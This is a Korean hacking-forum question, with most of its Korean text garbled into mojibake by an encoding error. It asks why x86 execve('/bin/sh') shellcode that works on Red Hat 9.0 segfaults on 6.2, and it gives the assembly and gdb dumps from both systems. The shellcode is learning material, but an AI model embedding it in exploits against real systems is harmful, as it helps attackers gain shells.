|
http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=1546 [º¹»ç]
Redhat 9.0¿¡¼ ½©ÄÚµå ¸¸µé±â ¹®¼¸¦ Âü°íÇؼ ½Ç½ÀÇغôµ¥ °Å±â¼ ÀߵǴø Äڵ带 6.2¿¡¼ Àû¿ëÇغ¼·Á´Ï±î µÇÁö¾Ê³×¿ä
ÄÄÆÄÀÏÀº ¶È°°ÀÌ µÇ´Âµ¥ ½ÇÇàÇÏ¸é ¼¼±×¸ÕÅ×ÀÌ¼Ç ÆúÆ®°¡¶å´Ï´Ù.
ÀÌ°Å Ä¿³Î¹öÀüÀÌ ´Þ¶ó¼ execveÇÔ¼ö ±¸Á¶µµ ´Þ¶ó¼ ±×·±°¡¿ä? ¾Æ´Ï¸é ÄÄÆÄÀÏ·¯(gcc)¹öÀüÂ÷ÀÌ ¶§¹®Àΰ¡¿ä?
ÁÖ¼®Àº Çѹø ´Þ¾ÆºÃ¾î¿ä..
.globl main
main:
jmp come_here
func:
//execve("/bin/sh"ÁÖ¼Ò,["/bin/sh"]+[0]¹è¿ Æ÷ÀÎÅÍ ½ÃÀÛÁÖ¼Ò,NULL);
movl $0x0b, %eax
//execve system call number 11
popl %ebx
//execve ÀÎÀÚ 1
//¹è¿Æ÷ÀÎÅÍ´Â esi¸¦ »ç¿ëÇÔ
movl %ebx, (%esi)
//Arrangement pointer("/bin/sh"address)
movl $0x00, 0x4(%esi)
//¹è¿ Æ÷ÀÎÅÍ+4(0)
//¹è¿Æ÷ÀÎÅÍ ½ÃÀÛÁÖ¼Ò
leal (%esi), %ecx
//execve ÀÎÀÚ 2
movl $0x00, %edx
//execve ÀÎÀÚ 3
int $0x80
//Interrupt!
//exit(0)
movl $0x01, %eax
//exit ÀÎÀÚ 1
movl $0x00, %ebx
//exit system call number 0
int $0x80
//Interrupt!
come_here:
call func
.string "/bin/sh\00"
6.2 gdb·Î ºÐ¼®
(gdb) disas main
Dump of assembler code for function main:
0x8048398 <main>: jmp 0x80483be <come_here>
End of assembler dump.
(gdb) disas come_here
Dump of assembler code for function come_here:
0x80483be <come_here>: call 0x804839a <func>
0x80483c3 <come_here+5>: das
0x80483c4 <come_here+6>: bound %ebp,0x6e(%ecx)
0x80483c7 <come_here+9>: das
0x80483c8 <come_here+10>: jae 0x8048432
0x80483ca <come_here+12>: add %al,(%eax)
0x80483cc <come_here+14>: nop
0x80483cd <come_here+15>: nop
0x80483ce <come_here+16>: nop
0x80483cf <come_here+17>: nop
End of assembler dump.
(gdb) disas func
Dump of assembler code for function func:
0x804839a <func>: mov $0xb,%eax
0x804839f <func+5>: pop %ebx
0x80483a0 <func+6>: mov %ebx,(%esi)
0x80483a2 <func+8>: movl $0x0,0x4(%esi)
0x80483a9 <func+15>: lea (%esi),%ecx
0x80483ab <func+17>: mov $0x0,%edx
0x80483b0 <func+22>: int $0x80
0x80483b2 <func+24>: mov $0x1,%eax
0x80483b7 <func+29>: mov $0x0,%ebx
0x80483bc <func+34>: int $0x80
End of assembler dump.
9.0 gdb·Î ºÐ¼®(9.0¿¡¼± Á¦´ë·Î µ¿ÀÛÇÔ)
(gdb) disas main
Dump of assembler code for function main:
0x080482f4 <main+0>: jmp 0x804831a <come_here>
End of assembler dump.
(gdb) disas come_here
Dump of assembler code for function come_here:
0x0804831a <come_here+0>: call 0x80482f6 <func>
0x0804831f <come_here+5>: das
0x08048320 <come_here+6>: bound %ebp,0x6e(%ecx)
0x08048323 <come_here+9>: das
0x08048324 <come_here+10>: jae 0x804838e <__do_global_ctors_aux+2>
0x08048326 <come_here+12>: add %al,(%eax)
End of assembler dump.
(gdb) disas func
Dump of assembler code for function func:
0x080482f6 <func+0>: mov $0xb,%eax
0x080482fb <func+5>: pop %ebx
0x080482fc <func+6>: mov %ebx,(%esi)
0x080482fe <func+8>: movl $0x0,0x4(%esi)
0x08048305 <func+15>: lea (%esi),%ecx
0x08048307 <func+17>: mov $0x0,%edx
0x0804830c <func+22>: int $0x80
0x0804830e <func+24>: mov $0x1,%eax
0x08048313 <func+29>: mov $0x0,%ebx
0x08048318 <func+34>: int $0x80
End of assembler dump.
(come_hereÀÇ call¹® µÞÂÊÀº .string "/bin/sh\00" ºÎºÐÀ» ¾î¼ÀÀ¸·Î ³ªÅ¸³»´Ùº¸´Ï Àú·¸°Ô µÈ°Ì´Ï´Ù.)
|
Hit : 3330 Date : 2011/12/04 11:18
|
1574, 
7/79 
